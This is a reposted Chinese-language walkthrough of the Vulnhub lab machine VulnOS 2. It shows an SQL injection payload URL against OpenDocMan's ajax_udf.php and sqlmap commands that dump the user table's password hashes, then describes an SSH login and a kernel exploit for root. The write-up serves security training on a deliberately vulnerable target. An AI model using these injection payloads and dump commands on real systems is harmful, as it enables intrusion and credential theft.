【Sword系列】Vulnhub靶机 VULNOS_ 2 writeup
  6k0GrpdiCjYb 2023年11月13日 38 0

个人博客地址: http://www.sword-blogs.com/

下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

在这里插入图片描述

信息搜集

获取IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

在这里插入图片描述 点击website跳转到/jabc 在这里插入图片描述 在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/ 在这里插入图片描述 在这里插入图片描述 访问/jabcd0cs/ 在这里插入图片描述 在/jabcd0cs/发现CMS的版本,使用searchsploit查询 在这里插入图片描述 在这里插入图片描述 这里看到了pyload

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

可以利用 在这里插入图片描述 使用sqlmap跑库

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 --dbs

在这里插入图片描述 跑表名

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs --tables

在这里插入图片描述 在odm_user表里面发现了有用户名密码

sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs -T odm_user --dump

在这里插入图片描述 将获取的哈希值解密 在这里插入图片描述

getshell

使用获取的用户名密码尝试登录ssh,使用webmin用户登录成功 在这里插入图片描述

提权

查看系统版本,内核版本 在这里插入图片描述 使用searchsploit查询找到一个符合条件的exp 在这里插入图片描述 将exp上传到靶机,赋予可执行权限,编译并执行,成功获取root权限 在这里插入图片描述 拿到root目录下的flag 在这里插入图片描述 到这里成功完成了该靶机!

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

上一篇: ACL(访问控制列表) 下一篇: 信息搜集
  1. 分享:
最后一次编辑于 2023年11月13日 0

暂无评论

推荐阅读
  5NWiQFAVeqgX   2024年05月17日   32   0   0 网络安全
  pTtIhLb24H2d   2024年05月17日   34   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   38   0   0 网络安全
  OKgNPeBk991j   2024年05月18日   47   0   0 网络安全
  rKgO6TN7xbYO   2024年05月17日   38   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   53   0   0 网络安全
  5NWiQFAVeqgX   2024年05月17日   36   0   0 网络安全
  YOkriIV1Am1d   2024年05月20日   39   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   37   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   40   0   0 网络安全
  owpmXY9hzjPv   2024年05月20日   34   0   0 网络安全
6k0GrpdiCjYb